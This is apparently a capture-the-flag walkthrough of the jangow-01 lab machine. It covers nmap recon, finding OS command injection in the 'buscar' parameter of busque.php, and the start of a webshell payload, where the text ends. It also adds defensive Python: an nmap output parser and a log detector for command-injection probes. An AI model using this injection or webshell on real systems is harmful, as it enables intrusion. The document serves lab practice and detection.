vulnhub jangow-01-1.0.1
Preface
Target: jangow-01-1.0.1
Attack machine: Kali Linux 2022.4
Target description
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214095347959-101662528.png
Attacking the box
Target discovery
Scan the subnet with nmap:
┌──(root㉿kali)-
└─# nmap 192.168.70.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:56 EST
Nmap scan report for 192.168.70.1
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.70.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.70.2
Host is up (0.000056s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.70.152
Host is up (0.00027s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:0C:29:67:A6:61 (VMware)
Nmap scan report for 192.168.70.254
Host is up (0.00022s latency).
All 1000 scanned ports on 192.168.70.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:EA:9C:6A (VMware)
Nmap scan report for 192.168.70.137
Host is up (0.0000070s latency).
All 1000 scanned ports on 192.168.70.137 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (5 hosts up) scanned in 11.44 seconds

The target's IP is 192.168.70.152. Next, scan its open ports in detail.
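Picking the target out of a subnet sweep by eye works for five hosts, but not for a /16. As an added example (not code from the original writeup), here is a small Python parser for nmap's normal terminal output, the same format shown in the scan above. It also handles the extra VERSION column that `nmap -A` prints, and the `_addr_key` helper, the sample input and the `OpenPort` type are my own.

```python
"""Parse nmap's normal (terminal) output into hosts and open ports.

Added example, not code from the original writeup. It handles the plain
`nmap <network>` output shown above and the `nmap -A -p-` output, whose port
lines carry an extra VERSION column.
"""
import ipaddress
import re
from typing import Dict, List, NamedTuple


class OpenPort(NamedTuple):
    port: int
    proto: str
    service: str
    version: str  # empty when nmap printed no VERSION column


# "Nmap scan report for 192.168.70.152" or "Nmap scan report for name (192.168.70.152)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \((?P<paren>[^)]+)\)|(?P<bare>\S+))$")
# "21/tcp open  ftp     vsftpd 3.0.3" - only ports in state "open" are kept
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_normal(text: str) -> Dict[str, List[OpenPort]]:
    """Map every host nmap reported on to its open ports (possibly none)."""
    hosts: Dict[str, List[OpenPort]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            current = m.group("paren") or m.group("bare")
            hosts.setdefault(current, [])
            continue
        if current is None:
            continue  # preamble before the first host report
        m = PORT_RE.match(line)
        if m:
            port, proto, service, version = m.groups()
            hosts[current].append(OpenPort(int(port), proto, service, (version or "").strip()))
    return hosts


def _addr_key(host: str):
    """Sort IP addresses numerically; anything else sorts after them as text."""
    try:
        return (0, int(ipaddress.ip_address(host)), "")
    except ValueError:
        return (1, 0, host)


def hosts_with_open_ports(hosts: Dict[str, List[OpenPort]]) -> List[str]:
    """Hosts exposing at least one open port, so the interesting targets stand out."""
    return sorted((ip for ip, ports in hosts.items() if ports), key=_addr_key)


# Subnet scan output from the writeup above, reproduced here as the sample input.
SAMPLE_SCAN = """\
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:56 EST
Nmap scan report for 192.168.70.1
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.70.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.70.2
Host is up (0.000056s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.70.152
Host is up (0.00027s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:0C:29:67:A6:61 (VMware)
Nmap scan report for 192.168.70.254
Host is up (0.00022s latency).
All 1000 scanned ports on 192.168.70.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:EA:9C:6A (VMware)
Nmap scan report for 192.168.70.137
Host is up (0.0000070s latency).
All 1000 scanned ports on 192.168.70.137 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (5 hosts up) scanned in 11.44 seconds
"""

if __name__ == "__main__":
    found = parse_nmap_normal(SAMPLE_SCAN)
    for ip in hosts_with_open_ports(found):
        print(ip, ", ".join(f"{p.port}/{p.proto} {p.service}" for p in found[ip]))
```

Hosts that answered but exposed nothing (192.168.70.1, .254 and the Kali box itself at .137) still appear in the dictionary with an empty list, which is useful when reconciling the sweep against an asset inventory; only `open` ports are recorded, so `open|filtered` results from UDP scans would need the regex widened.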
┌──(root㉿kali)-
└─# nmap -A -p- 192.168.70.152
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:59 EST
Nmap scan report for 192.168.70.152
Host is up (0.00042s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
MAC Address: 00:0C:29:67:A6:61 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.70.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds

Checking the website
First, visit port 80.
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214100405351-1404659867.png
It is a directory listing (Apache "Index of /"); look through it for anything useful.
A website is found under the site/ directory.
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214100554851-1079386142.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214100610408-136742029.png
Vulnerability discovery
Look around at the site's functionality.
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214101111829-1853916370.png
An endpoint that takes a parameter is found:
http://192.168.70.152/site/busque.php?buscar=
Test the buscar parameter.
Pass the value 1.
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214101245494-551390602.png
Nothing useful is echoed back. Pass id instead.
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214101330746-2084055498.png
The parameter turns out to allow remote command execution (RCE).
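Once a search parameter is known to be handed to a shell, the first thing the defending side wants is to find the probing in the web server's logs. As an added example (not code from the original writeup), here is a Python detector run over constructed Apache combined-format access log lines that imitate requests to the busque.php?buscar= endpoint above. It decodes the parameter value exactly as the server would and flags values that begin with a common command name or contain shell metacharacters; the command word list, the metacharacter set and the sample lines are my own assumptions.

```python
"""Flag probable OS command injection probes against a query parameter in Apache access logs.

Added example, not code from the original writeup. The log lines are constructed
in Apache's combined format to resemble requests to the busque.php?buscar=
endpoint discussed above; the set of command words and metacharacters is an
assumption to be tuned for the application being protected.
"""
import re
from typing import List, NamedTuple, Optional
from urllib.parse import parse_qs, urlsplit

# Apache combined log: ip ident user [time] "method target protocol" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Commands a tester typically tries first when probing for execution (the
# writeup above used `id` and `echo`); an ordinary search term never starts
# with one of these.
COMMAND_WORDS = {"id", "whoami", "uname", "echo", "cat", "ls", "pwd"}
# Characters that chain or substitute shell commands; rarely legitimate in a search string.
META_RE = re.compile(r"[;|&`$<>]")


class Finding(NamedTuple):
    ip: str
    timestamp: str
    value: str
    reason: str


def inspect_value(value: str) -> Optional[str]:
    """Return a reason string when the decoded parameter value looks like a shell command."""
    tokens = value.split()
    if tokens and tokens[0] in COMMAND_WORDS:
        return f"starts with shell command '{tokens[0]}'"
    m = META_RE.search(value)
    if m:
        return f"contains shell metacharacter '{m.group(0)}'"
    return None


def detect_command_injection(lines: List[str], param: str = "buscar") -> List[Finding]:
    """Scan access log lines and report requests whose `param` value looks like a command."""
    findings: List[Finding] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes and turns '+' into spaces, so the check sees
        # what the shell would have seen
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            reason = inspect_value(value)
            if reason:
                findings.append(Finding(m.group("ip"), m.group("ts"), value, reason))
    return findings


# Constructed sample: two ordinary searches, one unrelated request, and two probes
SAMPLE_LOG = """\
192.168.70.137 - - [13/Feb/2023:21:05:11 -0500] "GET /site/busque.php?buscar=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.70.137 - - [13/Feb/2023:21:05:40 -0500] "GET /site/busque.php?buscar=id HTTP/1.1" 200 560 "-" "Mozilla/5.0"
192.168.70.50 - - [13/Feb/2023:21:06:02 -0500] "GET /site/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.70.50 - - [13/Feb/2023:21:06:30 -0500] "GET /site/busque.php?buscar=hello+world HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.70.137 - - [13/Feb/2023:21:07:15 -0500] "GET /site/busque.php?buscar=echo%20%27test%27 HTTP/1.1" 200 530 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in detect_command_injection(SAMPLE_LOG.splitlines()):
        print(f"{f.ip} {f.timestamp} buscar={f.value!r}: {f.reason}")
```

The decode step matters: a rule matching the raw request line would miss `%20`- or `+`-encoded variants, while parse_qs normalises them the same way PHP's `$_GET` does. Quote characters are deliberately not in the metacharacter set because they appear in ordinary searches ("it's"); the `echo '` probe from the writeup is still caught by its leading command word. Note that GET parameters land in the access log, but the same injection sent via POST would not, so for POST endpoints the check belongs in the application or a WAF rather than in log review.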
Exploitation
Use this vulnerability to write a webshell.
Payload:
192.168.70.152/site/busque.php?buscar=echo '